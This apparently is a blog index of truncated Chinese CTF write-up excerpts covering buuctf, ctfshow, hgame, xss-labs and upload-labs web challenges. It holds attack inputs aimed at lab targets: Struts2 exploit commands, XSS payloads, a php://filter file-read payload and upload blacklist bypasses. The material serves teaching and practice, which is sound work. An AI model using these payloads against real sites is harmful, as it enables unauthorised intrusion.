buuctf Web 刷题记录 3
buuctf Web 刷题记录 3
参考:
php反序列化从入门到放弃(入门篇)
SSTI(模板注入)漏洞(入门篇)
[GYCTF2020]FlaskApp观察hint猜测在decode界面可以报错,输入a解密即可得到/app/app.py部分代码
@app.route('/decode',methods=['POST','GET'])def decode(): if request.values.get('text') : text = request.values.get("text") text_decode = base64.b64decode(text.encode()) tmp = "结果 : {0}".format(text_decode.decode()) if waf(tmp) : flash("no no no !!") ...
ctfshow Web入门 刷题记录 3
ctfshow-Web入门刷题记录3
参考:
CTFshow-WEB入门-node.js
Node.js 常见漏洞学习与总结
CTFSHOW nodejs篇
关于Prototype Pollution Attack的二三事
SSRF常见绕过思路
CTFshow-WEB入门-SSTI
CTFSHOW-SSTI
javaweb279-297使用工具即可
python Struts2Scan.py -u http://069d45bf-4a11-4909-8faf-1a1afff8fd0b.challenge.ctf.show/S2-001/login.actionpython Struts2Scan.py -u http://069d45bf-4a11-4909-8faf-1a1afff8fd0b.challenge.ctf.show/S2-001/login.action -n S2-003 --exec
根据提示echo FLAG易知flag在环境变量里,故执行env命令即可
web295可以用里面的图形化工具(S2-048漏洞)
web298反汇编一下看看登陆的逻辑即可
/c ...
ctfshow Web入门 刷题记录 2
ctfshow-Web入门刷题记录2
参考:
php反序列化从入门到放弃(入门篇)
php反序列化从入门到放弃(放弃篇)
CTFSHOW 反序列化篇
CTFshow-WEB入门-反序列化
CTFSHOW文件上传篇
MySQL 5.7 Reference Manual
MySQL时间盲注的五种延时方法实现
文件上传web151提示前台校验不可靠,禁用js或者直接发包就可(png即可)
POST /upload.php HTTP/1.1Host: 0e85dc83-97fd-4ea9-921a-3c2b43d36b63.challenge.ctf.showContent-Length: 202Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safar ...
hgame 2023 web题解
Week1Classic Childhood Gamehttp://week-1.hgame.lwsec.cn:30603/Res/Events.js
var a = ['\x59\x55\x64\x6b\x61\x47\x4a\x58\x56\x6a\x64\x61\x62\x46\x5a\x31\x59\x6d\x35\x73\x53\x31\x6c\x59\x57\x6d\x68\x6a\x4d\x6b\x35\x35\x59\x56\x68\x43\x4d\x45\x70\x72\x57\x6a\x46\x69\x62\x54\x55\x31\x56\x46\x52\x43\x4d\x46\x6c\x56\x59\x7a\x42\x69\x56\x31\x59\x35'];
运行得到
[ 'YUdkaGJXVjdabFZ1Ym5sS1lYWmhjMk55YVhCMEprWjFibTU1VFRCMFlVYzBiV1Y5' ]
base64解码两次即可得到
hgame{fUnnyJavascript&FunnyM0taG ...
ctfshow-年ctf-web题解
ctfshow 年CTF web题解除夕<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2023-01-18 11:36:09# @Last Modified by: h1xa# @Last Modified time: 2023-01-19 10:18:44# @email: h1xa@ctfer.com# @link: https://ctfer.com*/include "flag.php";$year = $_GET['year'];if($year==2022 && $year+1!==2023){ echo $flag;}else{ highlight_file(__FILE__);}
弱类型比较
/?year=2022.e
初三<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2023-01-19 10:31:36# @L ...
ctfshow Web入门 刷题记录 1
ctfshow-Web入门刷题记录1
参考:
ctfshow-Web1000题系列修炼(一)
CTFSHOW PHP特性篇 (下篇132-150)
无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)
信息搜集web1查看源码
web2view-source:
web3抓包,在响应包发现Flag: ctfshow{b5a5badc-46c5-4c2c-ad28-174f21781454}
web4/robots.txt/flagishere.txt
web5/index.php
web6/www.zip
web7/.git/
web8/.svn/
web9/index.php.swp
web10对Cookie中flag字段进行URL解码即可
web11在域名解析查询选定txt分类对flag.ctfshow.com进行查询即可
web12页面最底部发现Help Line Number : 372619038
访问\admin并使用admin/372619038即可登录
web13点击页面底部的INFORMATION分栏中最下面的document ...
buuctf Web 刷题记录 2
buuctf Web 刷题记录 2
参考:
无参数RCE总结
php无参数执行命令
最全phpmyadmin漏洞汇总
[网鼎杯 2018]Fakebook访问/robots.txt发现备份文件/user.php.bak
<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age; $this->blog = $blog; } function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); ...
xss-labs刷题记录
xss-labs 刷题记录
参考:
xss-labs通关大合集
xss-labs
Level1Payload/level1.php?name=<script>alert(1)</script>
源码分析<?php ini_set("display_errors", 0);$str = $_GET["name"];echo "<h2 align=center>欢迎用户".$str."</h2>"; //对用户的输入不加处理直接输出?>
Level2Payload/level2.php?keyword="><script>alert(1)</script>//&submit=搜索
源码分析想办法闭合value处然后把后面的内容注释掉即可
<?php ini_set("display_errors", 0);$str = $_GET["keyword" ...
buuctf Web 刷题记录 1
buuctf Web 刷题记录 1
参考:
命令执行漏洞利用及绕过方式总结
SSTI模版注入
flask 源码解析:session
客户端 session 导致的安全问题
PHP中MD5常见绕过
[ACTF2020 新生赛]Include点击hint后发现地址栏处有file=flag.php,故构造payload
http://ae8bac3b-f39b-4695-b09d-2906050c1289.node4.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php
得到flag.php的base64编码
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7ZTIyMWQyMzQtYThjNi00NzMyLTg2YzQtZWQzMTMxMzJlZGM0fQo=
解码即可得到flag
<?phpecho "Can you find out the flag?";//flag{e ...
upload-labs 刷题记录
upload-labs 刷题记录
参考:
HxD
upload-labs之pass 16详细分析
upload-labs通关攻略
Pass-01 js检查前端验证图片格式,禁用js或者使用burp抓包修改后缀即可。
访问http://127.0.0.1:8081/upload-labs/upload/phpinfo.php即可查看信息。
Pass-02 只验证content-type只验证了content-type类型,抓包修改即可
Pass-03 黑名单绕过采用黑名单机制,不允许上传.asp,.aspx,.php,.jsp后缀的文件,但可以上传.phtml .phps .php5 .pht,前提是apache的httpd.conf中有如下配置代码
AddType application/x-httpd-php .php .phtml .phps .php5 .pht
上传后注意关注下文件存储位置和文件名
Pass-04 .htaccess绕过禁止了一系列文件类型,但没有禁止.htaccess,不过该方法需要mod_rewrite模块开启且AllowOverride All。 ...